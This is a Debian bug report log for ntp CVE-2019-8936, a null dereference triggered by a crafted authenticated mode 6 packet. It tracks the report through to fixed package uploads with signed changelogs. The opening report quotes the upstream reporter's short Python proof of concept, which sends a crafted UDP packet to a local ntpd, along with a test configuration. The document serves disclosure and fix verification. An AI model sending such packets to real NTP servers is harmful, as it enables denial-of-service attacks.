Debian Bug report logs -
#924228
ntp: CVE-2019-8936: Crafted null dereference attack in authenticated mode 6 packet
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, team@security.debian.org, Debian NTP Team <ntp@packages.debian.org>:
Bug#924228; Package src:ntp.
(Sun, 10 Mar 2019 13:12:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, team@security.debian.org, Debian NTP Team <ntp@packages.debian.org>.
(Sun, 10 Mar 2019 13:12:05 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Source: ntp
Version: 1:4.2.8p12+dfsg-3
Severity: important
Tags: security upstream
Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565
Hi,
The following vulnerability was published for ntp.
CVE-2019-8936[0]:
Crafted null dereference attack in authenticated mode 6 packet
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
To verify/illustrate the issue/fix one can use the following as
provided by the reporter in the upstream report:
#!/usr/bin/env python
import sys
import socket
buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
"\x56\xc8\x07\xd4")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
and running ntpd uder valgrind as
valgrind ntpd -n -c ~/resources/ntp.conf
with ntp.conf:
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /path/to/keys
trustedkey 1
controlkey 1
requestkey 1
and keys
1 M gurka
2 M agurk
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2019-8936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936
[1] http://bugs.ntp.org/show_bug.cgi?id=3565
[2] http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
Reply sent
to Bernhard Schmidt <berni@debian.org>:
You have taken responsibility.
(Thu, 21 Mar 2019 21:42:11 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Thu, 21 Mar 2019 21:42:11 GMT) (full text, mbox, link).
Message #10 received at 924228-close@bugs.debian.org (full text, mbox, reply):
Source: ntp
Source-Version: 1:4.2.8p13-1
We believe that the bug you reported is fixed in the latest version of
ntp, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 924228@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bernhard Schmidt <berni@debian.org> (supplier of updated ntp package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Thu, 21 Mar 2019 22:01:16 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p13-1
Distribution: experimental
Urgency: medium
Maintainer: Debian NTP Team <ntp@packages.debian.org>
Changed-By: Bernhard Schmidt <berni@debian.org>
Closes: 764546 772790 924228
Changes:
ntp (1:4.2.8p13-1) experimental; urgency=medium
.
* New upstream version 4.2.8p13
- CVE-2019-8936: Crafted null dereference attack in authenticated
mode 6 packet (Closes: #924228)
* ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
* Drop locking from ntp initscript/systemd-wrapper
* Only delete ntpd statistics files in cronjob (Closes: #772790)
Checksums-Sha1:
65fd5b4a73ab30a36cbd2908f60447ff30612198 2241 ntp_4.2.8p13-1.dsc
cff200a987d64e891fb349a22313ecb0feaea090 6949363 ntp_4.2.8p13.orig.tar.gz
e836a0ca1d7e94ccdbb0d5187a09ae3b43e627c2 48360 ntp_4.2.8p13-1.debian.tar.xz
b16d573f0aed0be56b5464ae71846e6646027cfe 7822 ntp_4.2.8p13-1_amd64.buildinfo
Checksums-Sha256:
7bdd565de20c8fe43947f8c630b54c8c970bccbef7a45b199b01b11ef05e5518 2241 ntp_4.2.8p13-1.dsc
288772cecfcd9a53694ffab108d1825a31ba77f3a8466b0401baeca3bc232a38 6949363 ntp_4.2.8p13.orig.tar.gz
175d614c56b4669cbe45c230d1cd099f3f7086b61e602559494a796f372bde38 48360 ntp_4.2.8p13-1.debian.tar.xz
3bcd15a93c50ab7a690822e0d6fdfcd5162f420892331d77b6c8f402262946cc 7822 ntp_4.2.8p13-1_amd64.buildinfo
Files:
7ad550ad95830e959b997813eb8ce267 2241 net optional ntp_4.2.8p13-1.dsc
ea040ab9b4ca656b5229b89d6b822f13 6949363 net optional ntp_4.2.8p13.orig.tar.gz
ec9615ae8a95605e3fad204f83c9fedc 48360 net optional ntp_4.2.8p13-1.debian.tar.xz
efeeba8b84c7bad880141c2c39130ef8 7822 net optional ntp_4.2.8p13-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJFBAEBCgAvFiEE1uAexRal3873GVbTd1B55bhQvJMFAlyT/V8RHGJlcm5pQGRl
Ymlhbi5vcmcACgkQd1B55bhQvJP9Zw/+In+eNRtqcXopnGhhAs8nrR3bHOGna0hp
vTNTkOf+e5rvtG4Ka+3L+zOn23wibbYS/Wnkuw+3y+2+yM5fXnJ39f0WlI0Ht4EZ
XAun3zWB5Sl8J5y0/9k4nsDTFsnZliQevTm2XPWO9rNsOGNWDG4toDgbiZiIIz8r
VCnd4MXyIC1iI/M8yoShomJhl0f8pkGpqxbsrtX/XxE2wBB5XjgRqI7QF14rsd/S
MQ5JkgD6gItvcNfcNy41aIN4OKuau78OeILyZoDuE65xuQ0KCWelFySN2wdMNF1Y
Vlu+pgGt4x//njOsG2aAhGeq75efrYoSuH9EAgZsfq3l4aKmHRRQ31q0/l//3auS
NMMkZC9KqR2vIdIP+EModez0k92ifLDLSbSbTiXRTectE+kumlkOx6K9TgqtqI5P
ZSQsODhAkXFFYQE5GWBKPG7C+UX/fAzewEIXgVao8cyKI1IiFkavY5qepoec9Fh4
YX2bmW+tvm5MWh6tFntJDTY+mj3Z0gAGHgQ124ifcGk09SNSuDPXPutqBqph0G+s
XCxRp4T9gCVmR+Blddnb0BaGulOFlqTL1Ryb9dhLoK5A+p/Nt4A9xHK5ELWwgHRY
e2Y4ObGvJrJF7AY4k0xShdJfpb1XoHh6QErKCPGViy96Ye1t2Hx7RiSbtsRJbCH1
mz+ymklXd4s=
=IFb+
-----END PGP SIGNATURE-----
Reply sent
to Bernhard Schmidt <berni@debian.org>:
You have taken responsibility.
(Thu, 21 Mar 2019 23:15:10 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Thu, 21 Mar 2019 23:15:10 GMT) (full text, mbox, link).
Message #15 received at 924228-close@bugs.debian.org (full text, mbox, reply):
Source: ntp
Source-Version: 1:4.2.8p13+dfsg-1
We believe that the bug you reported is fixed in the latest version of
ntp, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 924228@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bernhard Schmidt <berni@debian.org> (supplier of updated ntp package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Thu, 21 Mar 2019 23:31:10 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p13+dfsg-1
Distribution: experimental
Urgency: medium
Maintainer: Debian NTP Team <ntp@packages.debian.org>
Changed-By: Bernhard Schmidt <berni@debian.org>
Closes: 764546 772790 924228
Changes:
ntp (1:4.2.8p13+dfsg-1) experimental; urgency=medium
.
* New upstream version 4.2.8p13+dfsg
- CVE-2019-8936: Crafted null dereference attack in authenticated
mode 6 packet (Closes: #924228)
* ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
* Drop locking from ntp initscript/systemd-wrapper
* Only delete ntpd statistics files in cronjob (Closes: #772790)
Checksums-Sha1:
ab2c8f0633ae928f541816c57c63a813b41628b1 2276 ntp_4.2.8p13+dfsg-1.dsc
fd1fa6cae4d6decfa80eee90e62b257410a4f9e1 4451644 ntp_4.2.8p13+dfsg.orig.tar.xz
c6270afcd16068b5361f9c7e30914965d2a6b47c 48356 ntp_4.2.8p13+dfsg-1.debian.tar.xz
9c788b307b32ce543bcb0fa985b1221d5c3e043c 7952 ntp_4.2.8p13+dfsg-1_amd64.buildinfo
Checksums-Sha256:
c88870f66bcea649417346635ce94b41c1d1ba7bc5dc25db01dcde30d9b4f909 2276 ntp_4.2.8p13+dfsg-1.dsc
fa010f03404a1667590ba613f3c83ee490442ab0ef1361d549675b00148e8f85 4451644 ntp_4.2.8p13+dfsg.orig.tar.xz
e0c692561a2665d317831cc317b64968384c910cd87b33b3d4e2197049ef6299 48356 ntp_4.2.8p13+dfsg-1.debian.tar.xz
561303ed422628b619909d6be09c86f1dfd6716c082e296dbf648a5e38bebdfb 7952 ntp_4.2.8p13+dfsg-1_amd64.buildinfo
Files:
c20b606e23924436bf6585c2c61f354e 2276 net optional ntp_4.2.8p13+dfsg-1.dsc
6808bf32bc5418a70e80035203373529 4451644 net optional ntp_4.2.8p13+dfsg.orig.tar.xz
7cd93e0b3b19601b383ad9facf0190dd 48356 net optional ntp_4.2.8p13+dfsg-1.debian.tar.xz
cb3abe5d59b495f719d268c7b927a4d8 7952 net optional ntp_4.2.8p13+dfsg-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJFBAEBCgAvFiEE1uAexRal3873GVbTd1B55bhQvJMFAlyUEbURHGJlcm5pQGRl
Ymlhbi5vcmcACgkQd1B55bhQvJN0khAAo3O7fgAS8sdO8hmlkmPvN3G8dIEsx2bM
o7e2/yqtFG+NcAiz0SALu/JwRxcw3VnqssMZOOBv8ZbYzrdA88uO7U8JHgM2kWO8
8i56LhREgBxOMivT+82Jmbh9e+UJdgoyH9s1mKWviOk6yKV2VaH3Lry+12d6qvps
/vfybg8V0VgOlW3PBcVjRjE3kJV9SzlNpFoqP5m8HPmwMLdsN+QwJej6HKAMLYV5
SoynYOP4NYkaRUzsYvDYAxP/vRZUG2vA43VHG+sqDhSFCDAVg6L2/eHmnO6aJ3lX
8dY8Pvw2lce38NVvtvzgmZ9MI+kxOXfrJaWlCkyE1/odeSmiSffvs1TEeLqmJwZc
JKnuW08ag9o6TWZRQ/GBjsRcr8S54YX255z5axj974j1TsOny7/gLmlqPv/ZwAaE
PROYorFgrqK3cXlRR/tA9n7IPLGxCc0evAa4rNVme4SvZtNpAfk7vTvYpQoY803S
NCrm36P/DmcMyS5Uv1bweq3QnjOXGWwfL75XBlCinoyDNEKE8pcJwaajF8H6qE9J
1IS1KxgQZxqce+bZpuaGrMmS+gTf+LH1eWhI8AxQaI3okeZCNx5PPpLTE1UxiHse
oXkr+d9AEn5G6wJYxkcgh4liZ2Ho41gjDF28NkTR4OTwzcHp73KINRA2nDOshKBf
nY2Wuy4Kx+Y=
=bbxs
-----END PGP SIGNATURE-----
Reply sent
to Bernhard Schmidt <berni@debian.org>:
You have taken responsibility.
(Thu, 11 Apr 2019 21:12:10 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Thu, 11 Apr 2019 21:12:10 GMT) (full text, mbox, link).
Message #20 received at 924228-close@bugs.debian.org (full text, mbox, reply):
Source: ntp
Source-Version: 1:4.2.8p12+dfsg-4
We believe that the bug you reported is fixed in the latest version of
ntp, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 924228@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bernhard Schmidt <berni@debian.org> (supplier of updated ntp package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Thu, 21 Mar 2019 23:42:36 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p12+dfsg-4
Distribution: unstable
Urgency: medium
Maintainer: Debian NTP Team <ntp@packages.debian.org>
Changed-By: Bernhard Schmidt <berni@debian.org>
Closes: 764546 772790 924228
Changes:
ntp (1:4.2.8p12+dfsg-4) unstable; urgency=medium
.
* CVE-2019-8936: Crafted null dereference attack in authenticated
mode 6 packet (Closes: #924228)
* ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
* Drop locking from ntp initscript/systemd-wrapper
* Only delete ntpd statistics files in cronjob (Closes: #772790)
Checksums-Sha1:
bc2c9a644aa269662946f8a81ee14791424c87f2 2276 ntp_4.2.8p12+dfsg-4.dsc
f498265b9030a5026351ad513101899eeb59628f 48796 ntp_4.2.8p12+dfsg-4.debian.tar.xz
ddf1de8eed42cc922a3045791cdaeb06dfb235ce 7952 ntp_4.2.8p12+dfsg-4_amd64.buildinfo
Checksums-Sha256:
bf2d1078bb12e39ee5bb537aa3bb20819bcc0f0d5d6ab1e51b15f7a59d79ef48 2276 ntp_4.2.8p12+dfsg-4.dsc
4500a8b0a2d2d5d0faccd60cf29f42869431ffcccdd5bbfe4a0b707cd9f3a21c 48796 ntp_4.2.8p12+dfsg-4.debian.tar.xz
f6a0a1ece17afe7184fa1cec7e99ab0506612b880a759b477124d59161719eb6 7952 ntp_4.2.8p12+dfsg-4_amd64.buildinfo
Files:
3d721af3d7a81ec67f035a19b6f23ed6 2276 net optional ntp_4.2.8p12+dfsg-4.dsc
bec40e0bda23a893e76843579c68d901 48796 net optional ntp_4.2.8p12+dfsg-4.debian.tar.xz
648112375cdd870e26f3becd4662496d 7952 net optional ntp_4.2.8p12+dfsg-4_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJFBAEBCgAvFiEE1uAexRal3873GVbTd1B55bhQvJMFAlyvqSoRHGJlcm5pQGRl
Ymlhbi5vcmcACgkQd1B55bhQvJN8wA//eqXMcbs/FhWR9CvZMBFwPR8WJf3T5vPd
6alSDslqIziSHV3vWV5al263Gfdm1U/k+7Z7nGPtCrr7WirM4IzqxZbf7AE3Z1lq
POu7MG+JKOQD04eiXwkX1B6zmJiVpBiz6qyv1xKgxTe8f/tlD2j3ZvIc/nN3ZDNz
XruMCg+Gmk4mV+UQhRdI17I6P2mXUefctK8To1SEQfIh6ZIgzRxh4wTPjJaBfhTM
68uaWVFRTrWEBko30EBWGGKojZtoiqn4R18Jj6jax9qKVu1CmvjsMVvxaldyL6Cl
5s8QDM9JTFDwhw70gLYfkpvisWC9ldfoZaZlBoRK7hnl9DJ8qsz+0rI2bgqwg9f3
HOWYyPra3CfCPDcRZxICvbE8IA24TW5eiaWyq3RDgJDfDxAgSsP2rHWOtPBVQOOb
+Ye4IfQQmwAtX6PnBJfCH4VPzJr3yQEkE2zGU8Wv/jYpsaaJ1ukplfwUA0lFMFuQ
Q/lrG1hdaeLh6VUBu37kEg318HFMoZKTr7DDmCpqHASv0XggOdxHRnBF0jCrqCoh
PkaCmuDoUb/ZmZVugpRI5NGM3fLw0511/jsUQkZkZdkj1A22vBuSTwy7JTsUj2zk
PaNLNUmewM6lqMTIv+jNzzhPcxcKuit0378p6MivTmxB8ltkepp1mgHiohM7HQ/E
u8j1bujBeY8=
=64oa
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Fri, 10 May 2019 07:26:26 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 14:34:44 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon